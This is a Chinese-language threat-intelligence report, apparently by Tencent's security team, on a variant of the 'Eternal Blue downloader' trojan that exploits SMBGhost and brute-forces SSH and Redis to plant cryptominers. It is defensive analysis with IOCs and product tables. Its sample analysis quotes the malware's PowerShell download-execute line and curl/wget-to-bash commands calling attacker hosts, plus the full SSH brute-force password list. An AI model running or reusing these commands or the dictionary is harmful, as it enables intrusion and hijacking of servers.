“黑球”行动再升级,SMBGhost漏洞攻击进入实战
“黑球”行動再升級,SMBGhost漏洞攻擊進入實戰
騰訊電腦管家
首發專欄:騰訊電腦管家關注
2020年6月10日,騰訊安全威脅情報中心檢測到永恒之藍下載器木馬出現變種。此次變種在上個版本“黑球”行動中檢測SMBGhost漏洞的基礎上首次啟用SMBGhost漏洞攻擊,之前的若干種病毒只是利用SMBGhost漏洞做掃描檢測,并無實質性攻擊利用。
一、背景
2020年6月10日,騰訊安全威脅情報中心檢測到永恒之藍下載器木馬出現變種。此次變種在上個版本“黑球”行動中檢測SMBGhost漏洞的基礎上首次啟用SMBGhost漏洞攻擊,之前的若干種病毒只是利用SMBGhost漏洞做掃描檢測,并無實質性攻擊利用。本次更新還啟用了SSH爆破以及新增Redis爆破能力攻擊Linux系統。?
由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞遠程攻擊獲取系統最高權限,可直接攻擊SMB服務造成RCE(遠程代碼執行),存在漏洞的計算機只要聯網就可能被黑客探測攻擊,并獲得系統最高權限。使得木馬針對Windows系統的攻擊威力再次增強。?
騰訊安全威脅情報中心曾多次發布SMBGhost漏洞風險提示,至今仍有近三分之一的系統未修補該漏洞,我們再次強烈建議所有用戶盡快修補SMBGhost漏洞(CVE-2020-0796)。?
此外永恒之藍下載器木馬還新增了針對Linux系統的遠程攻擊,在失陷系統創建定時任務并植入挖礦木馬功能,使得其攻擊的范圍繼續擴大,包括云上Linux主機等都可能成為攻擊目標。永恒之藍本次更新的主要目的是釋放挖礦木馬,并會按照慣例在開始挖礦前,清除其他挖礦木馬,以便獨占系統資源。?挖礦活動會大量消耗企業服務器資源,使正常業務受嚴重影響。?
騰訊安全系列產品應對永恒之藍下載器木馬的響應清單:
?
| 威 脅 情 報 | 騰訊T-Sec 威脅情報云查服務 (SaaS) | 1)永恒之藍下載器木馬黑產團伙相關IOCs已入庫。 各類安全產品可通過“威脅情報云查服務”提供的接口提升威脅識別能力。 可參考:https://cloud.tencent.com/product/tics |
| 騰訊T-Sec 高級威脅追溯系統 | 1)永恒之藍下載器木馬黑產團伙相關信息和情報已支持檢索。 網管可通過威脅追溯系統,分析日志,進行線索研判、追溯網絡入侵源頭。T-Sec高級威脅追溯系統的更多信息,可參考:https://cloud.tencent.com/product/atts | |
| 云原生安全 防護 | 騰訊T-Sec 安全運營中心 (云SOC) | 基于客戶云端安全數據和騰訊安全大數據的云安全運營平臺。已接入騰訊主機安全(云鏡)、騰訊御知等產品數據導入,為客戶提供漏洞情報、威脅發現、事件處置、基線合規、及泄漏監測、風險可視等能力。 ? 關于騰訊T-Sec安全運營中心的更多信息,可參考:https://s.tencent.com/product/soc/index.html |
| 騰訊T-Sec 網絡資產風險監測系統 (騰訊御知) | 1)騰訊御知已支持監測全網資產是否受永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影響。 2)已集成無損檢測POC,企業可以對自身資產進行遠程檢測。 ? 關于騰訊T-Sec網絡資產風險監測系統的更多信息,可參考:https://s.tencent.com/product/narms/index.html | |
| 云防火墻 (Cloud Firewall,CFW) | 基于網絡流量進行威脅檢測與主動攔截,已支持: 1)利用永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相關聯的IOCs已支持識別檢測; 2)支持下發訪問控制規則封禁目標端口,主動攔截永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相關訪問流量。 ? 有關云防火墻的更多信息,可參考: https://cloud.tencent.com/product/cfw | |
| 騰訊T-Sec ?主機安全 (Cloud Workload Protection,CWP) | 1)云鏡已支持永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的檢測; 2)已支持查殺利用永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授權訪問漏洞入侵的挖礦木馬、后門程序。 ? 騰訊主機安全(云鏡)提供云上終端的防毒殺毒、防入侵、漏洞管理、基線管理等。關于T-Sec主機安全的更多信息,可參考:https://cloud.tencent.com/product/cwp | |
| 非云企業安全防護 | 騰訊T-Sec 高級威脅檢測系統 (騰訊御界) | 基于網絡流量進行威脅檢測,已支持: 1)利用永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相關聯的IOCs已支持識別檢測; 2)對利用永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796協議特征進行識別檢測; 關于T-Sec高級威脅檢測系統的更多信息,可參考: https://cloud.tencent.com/product/nta |
| 騰訊T-Sec終端安全管理系統(御點) | 1)可查殺永恒之藍下載器木馬團伙入侵釋放的后門木馬、挖礦木馬程序; 2)企業終端管理系統已支持檢測黑產利用永恒之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相關的網絡通信。 3)企業終端管理系統已支持檢測利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻擊的病毒程序; 騰訊御點提供企業終端的防毒殺毒、防入侵、漏洞管理、基線管理等能力,關于T-Sec終端安全管理系統的更多資料,可參考:https://s.tencent.com/product/yd/index.html |
更多產品信息,請參考騰訊安全官方網站https://s.tencent.com/?
二、樣本分析
攻擊模塊if.bin在smbghost_exec函數中利用從hxxp://d.ackng.com/smgh.bin下載的SMBGhost漏洞攻擊程序發起攻擊,攻擊成功后遠程執行以下shellcode:
powershell IEx(New-ObjectNet.WebClient).DownLoadString(”http[:]///t.amynx.com/smgho.jsp?0.8*%computername%”)
?
發起針對Linux服務器的攻擊:?
1、 利用SSH爆破
掃描22端口進行探測,針對Linux系統root用戶,嘗試利用弱密碼進行爆破連接,爆破使用密碼字典:
“saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,”",”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta”
?
爆破登陸成功后執行遠程命令:
Src=ssho;(curl -fsSLhttp[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O-http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash
?
2、 利用Redis未授權訪問漏洞
掃描6379端口進行探測,在函數redisexec中嘗試連接未設置密碼的redis服務器,訪問成功后執行遠程命令:export src=rdso;curl-fsSL t.amynx.com/ln/core.png?rdso|bash
?
SSH爆破和Redis爆破登陸成功均會執行Linux Shell腳本core.png,該腳本主要有以下功能:
1、 創建crontab定時任務下載和執行腳本http[:]//t.amynx.com/ln/a.asp
2、 創建crontab定時啟動Linux平臺挖礦木馬/.Xll/xr
?
通過定時任務執行的a.asp首先會清除競品挖礦木馬:
?
然后通過獲取/root/.sshown_hosts中記錄的本機SSH登陸過的IP,重新與該機器建立連接進行內網擴散攻擊:
?
創建目錄/.Xll并下載挖礦木馬(d[.]ackng.com/ln/xr.zip)到該目錄下,解壓得到xr并連接礦池lplp.ackng.com:444啟動挖礦。
?
永恒之藍下載器木馬自2018年底誕生以來一直處于高度活躍狀態,目前該木馬會通過以下方法進行擴散傳播:
| “永恒之藍”漏洞利用MS17-010 | $IPC爆破 | 通過U盤、網絡共享盤 | 以新冠肺炎等多種主題 |
| Lnk漏洞利用CVE-2017-8464 | SMB爆破 | 創建帶漏洞lnk文件、js文件 | DOC漏洞文檔、js文件誘餌 |
| Office漏洞利用CVE-2017-8570 | MS SQL爆破 | ||
| SMBGhost漏洞利用CVE-2020-0796 | RDP爆破 | ||
| Redis未授權訪問漏洞(針對Linux) | SSH爆破(針對Linux) |
??
截止2020年6月12日,永恒之藍木馬下載器家族主要版本更新功能列表如下:
| 2018年12月19日 | 下載之后的木馬新增Powershell后門安裝。 |
| 2019年1月9日 | 檢測到挖礦組件xmrig-32.mlz/xmrig-64.mlz下載。 |
| 2019年1月24日 | 木馬將挖礦組件、升級后門組件分別安裝為計劃任務,并同時安裝Powershell后門。 |
| 2019年1月25日 | 木馬在1月24日的基礎上再次更新,將攻擊組件安裝為計劃任務,在攻擊時新增利用mimikatz搜集登錄密碼,SMB弱口令爆破攻擊,同時安裝Powershell計劃任務和hta計劃任務。 |
| 2019年2月10日 | 將攻擊模塊打包方式改為Pyinstaller。 |
| 2019年2月20日 | 更新礦機組件,下載釋放XMRig礦機,以獨立進程啟動挖礦。 |
| 2019年2月23日 | 攻擊方法再次更新,新增MsSQL爆破攻擊。 |
| 2019年2月25日 | 在2月23日基礎上繼續更新,更新MsSQL爆破攻擊時密碼字典,添加樣本文件簽名。至此攻擊方法集成永恒之藍漏洞攻擊、SMB爆破攻擊、MsSQL爆破攻擊,同時使用黑客工具mimiktaz、psexec進行輔助攻擊。 |
| 2019年3月6日 | 通過已感染機器后門更新Powershell腳本橫向傳播模塊ipc。 |
| 2019年3月8日 | 通過已感染機器后門更新PE文件橫向傳播模塊ii.exe,采用無文件攻擊技術。該團伙使用的Powershell攻擊代碼與2018年9月發現的Mykings僵尸網絡變種攻擊代碼有諸多相似之處。 |
| 2019年3月14日 | 通過后門更新增肥木馬大小、生成隨機文件MD5逃避查殺,將生成的大文件木馬拷貝到多個系統目錄并通過注冊表啟動項、開始菜單啟動項、計劃任務進自啟動。 |
| 2019年3月28日 | 更新無文件攻擊模塊,更后新的攻擊方式為:永恒之藍漏洞攻擊、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通過Payload安裝計劃任務將木馬具有的多個惡意程序進行下載。 |
| 2019年4月3日 | 開創無文件挖礦新模式:挖礦腳本由PowerShell下載在內存中執行。 |
| 2019年7月19日 | 無文件攻擊方法新增CVE-2017-8464 Lnk漏洞利用攻擊,感染啟動盤和網絡共享盤,新增MsSQL爆破攻擊。 |
| 2019年10月9日 | 新增Bluekeep漏洞CVE-2019-0708檢測上報功能。 |
| 2020年2月12日 | 使用DGA域名,篡改hosts文件。 |
| 2020年4月3日 | 新增釣魚郵件傳播,郵件附件urgent.doc包含Office漏洞CVE-2017-8570。 |
| 2020年4月17日 | 釣魚郵件新增附件readme.zip、readme.doc,新增Bypass UAC模塊7p.php,創建readme.js文件感染可移動盤、網絡共享盤 |
| 2020年5月21日 | 新增SMBGhost漏洞CVE-2020-0796檢測上報功能,新增SSH爆破代碼(未調用)。 |
| 2020年6月10日 | 新增SMBGhost漏洞CVE-2020-0796利用攻擊,新增SSH爆破、Redis爆破攻擊Linux服務器并植入Linux平臺挖礦木馬。 |
?
IOCs
Domain
t.amynx.com
t.zer9g.com
t.zz3r0.com
d.ackng.com
?
URL
http[:]//t.amynx.com/smgh.jsp
http[:]//t.amynx.com/a.jsp
http[:]//t.amynx.com/ln/a.asp
http[:]//t.amynx.com/ln/core.png
http[:]//d.ackng.com/if.bin
http[:]//d.ackng.com/smgh.bin
http[:]//d.ackng.com/ln/xr.zip
?
Md5
| xr.zip | 2977084f9ce3e9e2d356adaf2b5bdcfd |
| core.png | 17703523f5137bc0755a7e4f133fc9d3 |
| a.asp | 8b0cb7a0760e022564465e50ce3271bb |
| smgh.bin | 5b3c44***3c7e592e416f68d3924620f |
?
參考鏈接:
永恒之藍木馬下載器發起“黑球”行動,新增SMBGhost漏洞檢測能力
https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ
總結
以上是生活随笔為你收集整理的“黑球”行动再升级,SMBGhost漏洞攻击进入实战的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 我爷爷都看的懂的《栈和队列》,学不会来打
- 下一篇: JC24B 2.4G无线模块配置